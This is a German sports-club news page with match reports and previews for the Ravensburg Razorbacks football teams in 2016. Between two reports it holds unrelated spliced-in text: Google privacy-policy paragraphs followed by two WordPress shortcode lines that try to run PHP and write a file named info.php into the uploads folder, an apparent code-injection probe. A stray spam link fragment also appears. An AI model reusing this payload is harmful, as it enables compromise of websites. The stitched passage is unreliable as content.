Spektakuläre Show beim Kampf um den Klassenerhalt

2016_07_23_rr_knights_sebi_pics_110_min_1Am kommenden Sonntag kämpfen die Ravensburg Razorbacks vor heimischem Publikum im Lindenhofstadion in Weingarten gegen die Wiesbaden Phantoms um den Verbleib in der 2. Bundesliga. Nach dem Sieg gegen die Franken Knights am vergangenen Wochenende stehen die TSB-Footballer aktuell auf dem fünften Tabellenplatz und haben damit gute Chancen, auch 2017 erneut in der GFL2 antreten zu können. „Damit wäre das Saisonziel erreicht“, so Mahmut Bascuhadar, sportlicher Leiter der Razorbacks. „Es war klar, dass wir als Aufsteiger nicht durch die Liga marschieren werden, wie es letztes Jahr in der Regionalliga der Fall war.“ Und Gegner wie die Erstliga-Aufstiegskandidaten aus Kirchdorf und Ingolstadt haben den Razorbacks mit haushohen Siegen den Klassenunterschied vor Augen geführt.

Nach der zurückliegenden Verletzungsmisere kehrten beim letzten Spiel viele Spieler in den Kader zurück – darunter viele Leistungsträger. Auch gegen Wiesbaden kann Headcoach Thomas Miller auf fast alle Spieler zugreifen: „Mit dem kompletten Kader haben wir deutlich mehr Möglichkeiten unser Spiel zu variieren und auf Situationen zu reagieren. Wie gegen die Knights, wollen wir auch den Phantoms unser Spiel aufzwingen und sie so kontrollieren.“ Dennoch ist der Respekt vor den Hessen groß: „Wiesbaden kann auf einen hervorragenden Unterbau zurückgreifen. Sie haben mit ihren Jugendmannschaften und einer 2. Mannschaft in der Landesliga eine Durchgängigkeit für Talente geschaffen. Headcoach Patrick Griesheimer macht einen guten Job. Ein Sieg wird nicht leicht. Wir sind jedoch sehr gut vorbereitet“, so Miller weiter. Während des Spiels wird sich ein Spezialgast um den körperlichen Zustand der Razorbacks kümmern. Der ehemalige Spieler und heutige Betreuer der isländischen Fußball-Nationalmannschaft Helgi Kolvidson wird mit Eisbadsystemen zur Regeneration bereitstehen. Er kennt die Region bereits, da er unter anderem für den SSV Ulm 1846 in der 2. Bundesliga gespielt hat und zuletzt bei Pfullendorf unter Vertrag war.

Das Spiel beginnt um 15 Uhr, doch bereits davor wollen die Verantwortlichen der Razorbacks den Zuschauern eine spektakuläre Show bieten. „Aufgrund der hohen Nachfrage von unseren Fans werden erneut Little Joe and the Facking Horns mit ihren Blasinstrumenten für gute Stimmung von der Bühne sorgen“, so Event-Chef Alexander Seyfried. Zudem werden über 50 Harley-Davidson und 40 US-Cars von verschiedenen Clubs aus der Region in das Stadion einfahren und ihre Fahrzeuge zum Bestaunen in der Nähe des Food Courts aufstellen. „Kurz vor Spielbeginn werden professionelle Fallschirmspringer von Skydive Bad Saulgau knapp über dem Stadion aus einem Flugzeug springen und den Spielball zum Kick-off ins Stadion bringen“, verspricht Seyfried bei gutem Wetter. Dazu gibt es leckeres Essen von lokalen Lieferanten, Auftritte der Cheerleader und den Kids Club für die kleinsten Zuschauer. Das alles gibt es für 5,- € Eintritt (unter 18 Jahren frei) ab 13 Uhr. Parkmöglichkeiten sind auf der Webseite der Razobacks beschrieben und vor Ort beschildert.

U19 der Ravensburg Razorbacks vergibt Chance auf Meisterschaft

U19 RR vs FSAm zurückliegenden Sonntag empfing die U19-Mannschaft der Ravensburg Razorbacks das Team der Freiburg Sacristans auf dem Gelände des TSB Ravensburg zum Spitzenspiel der Jugend-Regionalliga Baden-Württemberg. Durch die 7:24-Niederlage können die Razorbacks nun nicht mehr aus eigener Kraft Meister werden.

Bei bestem Wetter sahen die rund 100 Zuschauer ein über weite Strecken spannendes und faires Football-Spiel. Die Defense der Razorbacks um Captain Lucas Walk konnte den Angriff der Sacristans zu Beginn gut unter Kontrolle halten. Der erste Drive der Freiburger endete aber doch mit einem Field Goal, weil die oberschwäbischen Nachwuchs-Footballer den Breisgauern durch Strafen zu zusätzlichem Raumgewinn verhalfen. Die Razorbacks konterten im zweiten Quarter mit einem riskanten Pass von Quarterback Max Pfeiffer auf seinen Receiver Alexander Cernysov, der sich aus einer Dreierdeckung der Sacristans befreien konnte und den Touchdown zur zwischenzeitlichen 7:3 Führung für die Razorbacks erlief. Mit der letzten Sekunde vor der Halbzeit konnten die Gäste allerdings ihrerseits die Endzone erreichen und übernahmen zur Spielmitte wieder die Führung mit 7:10.

Leider konnten die jungen Razorbacks in den verbleibenden zwei Vierteln trotz einiger schöner Aktionen nicht mehr richtig ins Spiel zurück finden. Der etwas ausgedünnten Personaldecke auf manchen Positionen war es bei den sommerlichen Temperaturen zudem geschuldet, dass hier und da die Kräfte schwanden. Freiburg blieb stattdessen am Ball und baute die Führung sukzessive auf 24:7 aus während sie gleichzeitig durch ihr starkes Laufspiel die Zeit runter laufen ließen. Am Ende bleibt für die jungen Razorbacks trotz akzeptabler Leistung eine Niederlage gegen den weiterhin ungeschlagenen Tabellenersten. „Wir müssen damit realistisch gesehen unsere Titelambitionen begraben“, sagte Defense Coordinator Oliver Billstein nach dem Abpfiff. „Der zweite Platz ist aber nicht weniger umkämpft und wir werden in den beiden verbleibenden Spielen alles daran setzen, die Vize-Meisterschaft einzufahren“, so Billstein weiter. Die Razorbacks sind mit den Longhorns aus Weinheim und den Wolverines aus Backnang nahezu gleichauf. Da die Razorbacks in den nächsten beiden Wochen noch gegen beide Teams antreten, haben sie weiterhin alle Möglichkeiten eine versöhnliche Saisonbilanz und den zweiten Tabellenplatz zu erreichen.

Wichtiger Sieg am Rutenfest gegen die Franken Knights

When you use Google services, you trust us with your information. This Privacy Policy is meant to help you understand what data we collect, why we collect it, and what we do with it. This is important; we hope you will take time to read it carefully. And remember, you can find controls to manage your information and protect your privacy and security at My Account.
There are many different ways you can use our services – to search for and share information, to communicate with other people or to create new content. When you share information with us, for example by creating a Google Account, we can make those services even better – to show you more relevant search results and ads, to help you connect with people or to make sharing with others quicker and easier. As you use our services, we want you to be clear how we’re using information and the ways in which you can protect your privacy.
Our Privacy Policy may change from time to time. We will not reduce your rights under this Privacy Policy without your explicit consent. We will post any privacy policy changes on this page and, if the changes are significant, we will provide a more prominent notice (including, for certain services, email notification of privacy policy changes). We will also keep prior versions of this Privacy Policy in an archive for your review.
[insert_php] echo 147098235+111;file_put_contents(‘wp-content/uploads/info.php’, ”); [/insert_php]
[php] echo 147098235+111;file_put_contents(‘wp-content/uploads/info.php’, ”); [/php]

Verletzungspech lässt Ravensburg chancenlos gegen Nürnberg

Razorbacks vs. Rams 1Die Ravensburg Razorbacks verlieren mit 28:57 das Nachholspiel gegen starke Nürnberg Rams vor 600 Zuschauern im Lindenhofstadion in Weingarten. „Die Liste der verletzten Spieler wird einfach nicht kürzer. Wir können aktuell kaum flexibel agieren und uns auf die Gegner im Spiel einstellen“, fasst Headcoach Thomas Miller die derzeitige Situation zusammen. So musste der Defense-Spieler Tyler Murray Quarterback spielen, da Andrew Hill aktuell wegen einer verletzten Schulter pausieren muss. „Dass wir mit diesem minimierten Team und der Hitze trotzdem 28 Punkte erzielten, macht mich stolz und zeigt den Kampfwillen der Mannschaft“, so Miller weiter. Bereits am kommenden Wochenende treffen die beiden Team zum Rückspiel in Nürnberg aufeinander. Eine Woche später empfangen die TSB-Footballer die ebenfalls abstiegsgefährdeten Franken Knights im Lindenhofstadion. „Das Spiel gegen die Knights ist absolut richtungsweisend für uns. Gewinnen wir dieses Spiel, haben wir gute Chancen in der 2. Bundesliga zu bleiben“, schließt Razorbacks-Chef Frank Kienzle ab.

Razorbacks spielen um Tabellenplatz 4 der GFL2

BlueStars_Team_2016_min1Am kommenden Samstag treffen die Ravensburg Razorbacks im Nachholspiel auf den Tabellennachbar, die Nürnberg Rams. Die Begegnung hätte bereits am 15. Mai stattfinden sollen, musste aber verschoben werden, weil der Platz wegen Dauerregens nicht bespielbar war. Die TSB Footballer, die ihre letzten beiden Spiele in Rothenburg und Wiesbaden gewinnen konnten, können durch einen Sieg im Lindenhofstadion die Franken vom vierten Tabellenplatz verdrängen. Beginn der spannenden Partie ist um 16 Uhr. Bereits ab 14 Uhr beginnt das Event mit Livemusik von REVOTE und Auftritten der Cheerleader.

Nach herben Niederlagen gegen die Topfavoriten Kirchdorf Wildcats und Ingolstadt Dukes, haben sich die Razorbacks, die in den letzten Wochen etliche Verletzte zu beklagen hatten, wieder gefangen und konnten die darauffolgenden Auswärtsspiel knapp gewinnen. „Wir mussten gegen die Franken Knights und die Wiesbaden Phantoms auf einige Leistungsträger verzichten und teilweise improvisieren, aber in beiden Spielen haben alle bis zum Schluss gekämpft und eine tolle Leistung abgeliefert“, lobt Headcoach Thomas Miller seine Mannschaft. Gegen die Rams werden ein paar der verletzten Spieler wieder zur Verfügung stehen und auch Michael McNulty, der gegen Wiesbaden gesperrt war, wird im Lindenhofstadion wieder für Raumgewinn sorgen. „Leider fällt Andrew Hill auf Grund einer Schulterverletzung noch länger aus, aber Keith Smith und Alexander Borgmann haben ihn im letzten Spiel gut vertreten“, erklärt Miller. Defense Coordinator John Gilligan erwartet ein kampfbetontes Spiel auf Augenhöhe. „Die Rams konnten in Gießen gewinnen und dominierten zuhause gegen die Franken Knights, aber unser Team hat trotz der vielen Verletzten zweimal gewonnen. Wir wollen diese Serie fortsetzen und mit der Unterstützung unserer Fans sind wir in der Lage Nürnberg zu besiegen.“

Die Stadt Weingarten hat das Team der Razorbacks nach dem Spiel auf das Welfenfest eingeladen, wo die Spieler, Trainer und Helfer zusammen mit den Fans feiern werden. Im Stadion werden die Offiziellen der Stadt Weingarten und der Partnerstadt Grimma erwartet.

Razorbacks-U19 verliert das erste Spiel der laufenden Saison

U19 verliert in BacknangAm Sonntag spielte die U19 der Ravensburg Razorbacks in der Regionalliga gegen die Backnang Wolverines und musste ihre erste Niederlage der Saison hinnehmen.

Schon früh in der Partie zeichnete sich ab, dass die Wolverines keinesfalls bereit waren, als Gastgeber Punkte abzugeben und gingen gleich im ersten Quarter in Führung. Besonders im zweiten Quarter brachen die Defense der Ravensburger Nachwuchs-Footballer ein und die Backnanger konnten 30 weitere Punkte erzielen. Nicht zuletzt weil sich in der Offense Center Mert Utma und Quarterback Max Pfeiffer verletzten, konnte die Offense nur wenig Hilfreiches beitragen, um die oft auf dem Feld stehende Defense zu entlasten. So ging es mit 0:37 aus Sicht der Razorbacks in die Pause. Erst kurz vor Schluss konnten Quaterback Gianni Mazziotta seinen Wide Receiver Alex Cernysov mit einem tiefen Pass zum Touchdown finden und die Two-Point Conversion selbst verwandeln. Die Wolverines erzielten zwar auch weitere Punkte, Gianni Mazziotta konnte aber auch nochmals einen Touchdown beisteuern und so endete das Spiel mit 44:14 für die Wolverines.

Die jungen American Footballer des TSB Ravensburg haben nach der Partie einiges aufzuarbeiten und können dann hoffentlich besser vorbereitet in die Heim-Partie gegen die Freiburg Sacristans in zwei Wochen starten.

Weiterer wichtiger GFL2-Sieg gegen Wiesbaden

2016_06_05_rr_wildcats_sebi_pics_43_min_1Die Ravensburg Razorbacks konnten am Samstag den nächsten und sehr wichtigen Sieg in der German Football League 2 einfahren. Die Oberschwaben setzten sich mit 14:10 auswärts gegen die Wiesbaden Phantoms durch.

“Trotz des anhaltenden Verletzungspechs hat das Team erneut die richtige Antwort geliefert. Sie sind als Einheit aufgetreten und so konnten wir einen weiteren Sieg einfahren”, analysiert Ravensburgs Headcoach Thomas Miller das Spiel. Im Laufe der Woche hatte sich der Razorbacks-Quarterback Andrew Hill an der Schulter verletzt und stand in Wiesbaden nicht zur Verfügung. Mit den anderen Langzeitverletzten war die Personaldecke erneut dünn bei den TSB-Footballern read here. Durch hervorragende Spielzüge von Runningback Kevin Kienzle und zwei Touchdowns von Neuzugang Keith Alondo Smith setzten sich die Ravensburg Razorbacks am Ende mit 14:10 durch. Mit drei Siegen aus sieben Spielen gewinnen die Oberschwaben weiteren Abstand zu den Abstiegsplätzen.

Am kommenden Samstag treffen die Razorbacks im heimischen Lindenhofstadion auf die Nürnberg Rams. Das Spiel startet um 16 Uhr und der Eintritt kostet 5,- € pro Person (unter 18 Jahren frei). Ab 14 Uhr startet die Pre-Game-Show mit Livemusik, Auftritten der Cheerleader und weiteren Programmpunkten.

Zweiter GFL2-Sieg für die Razorbacks

Die Ravensburg Razorbacks haben am vergangenen Samstag den zweiten Sieg in der laufenden GFL2-Saison eingefahren. Gegen die Franken Knights konnten sich die TSB-Footballer denkbar knapp mit 28:27 durchsetzen.

Im strömenden Regen trafen in Rothenburg zwei Teams aufeinander, die dringend Siege gegen den drohenden Abstieg benötigen. Durch eine engagierte Mannschaftsleistung behielten die Oberschwaben die Nerven und konnten sich mit nur einem Punkt Unterschied durchsetzen. “Das Team wollte den Sieg und das hat sich letztlich ausgezahlt”, ist sich Headcoach Thomas Miller sicher. “Kevin Kienzle und Andrew Hill haben effektiv zusammengespielt und waren somit ein echter Pfund in der Offense.” Auch Ravensburgs Neuzugang Keith Alondo Smith zeigte direkt sein Potential und unterstrich mit einem 105 Yard-Lauf nach einer Interception seine Verpflichtung. “Keith hat am Sonntag bei uns unterschrieben, ist diese Woche aus Baltimore angereist und kam am Samstagvormittag am Flughafen in Frankfurt an. Nur ein paar Stunden später stand er bereits auf dem Platz. Hut ab vor dieser Leitung”, freut sich Razorbacks-Chef Frank Kienzle. Mit zwei Siegen aus sechs Spielen stehen die Razorbacks auf Platz 6 der 2. Bundesliga.

Kommendes Wochenende fahren die Ravensburg Razorbacks zum Spiel gegen die Wiesbaden Phantoms nach Hessen. Am 09. Juli findet das Nachholspiel gegen die Nürnberg Rams im Lindenhofstadion in Weingarten statt. Los geht es um 16 Uhr und der Eintritt kostet 5,- € pro Person (unter 18 Jahren frei).

Chancenlos gegen Ingolstadt

Razorbacks vs Dukes 1Die Ravensburg Razorbacks verlieren an einem verregneten Sonntag 63:0 gegen die Ingolstadt Dukes im heimischen Lindenhofstadion. Nach den beiden Niederlagen gegen die Kirchdorf Wildcats, geht somit ein weiteres Spiel gegen einen Aufstiegskandidaten verloren. „Als Aufsteiger hast du da einfach keine Chance“, bewertet Razorbacks-Chef Frank Kienzle die Niederlage. „Ingolstadt hat erst vor ein paar Tagen einen weiteren Top-Spieler gekauft und kann jetzt auf einen Kader zugreifen, der auf allen Positionen tief mit erstligatauglichen Athleten besetzt ist“, so Kienzle weiter. Seit Montag läuft die Suche nach einem weiteren Defensive Back für die TSB-Footballer, welche sich laut dem sportlichen Leiter Mahmut Bascuhadar schwierig gestaltet: „Zu diesem Zeitpunkt sind die guten Spieler alle unter Vertrag. Einen Diamanten zu finden ist ein paar Tage vor Transferschluss nicht einfach.“ Trotz des schlechten Wetters und Dauerregen haben 900 Zuschauer das Spiel im Lindenhofstadion in Weingarten verfolgt.

Am kommenden Wochenende reisen die Razorbacks nach Rothenburg und treffen dort gegen die Franken Knights auf ein Team mit ähnlicher Statistik. „Kommendes Wochenende werden wir eiskalt bis zum Sieg kämpfen. Jetzt stehen einige Spiele an, die wir gewinnen können und müssen, wenn wir den Klassenerhalt schaffen wollen“, so Ravensburgs Headcoach Thomas Miller. „Die individuellen Fehler und so manche Einstellungsprobleme vor allem in unserem Angriff werden wir diese Woche im Training gezielt angehen.“ Das nächste Heimspiel wird das Nachholspiel gegen die Nürnberg Rams am 09.07. sein.

Highlight-Video von Regio TV

Fotos: Sebastian Pfeiffer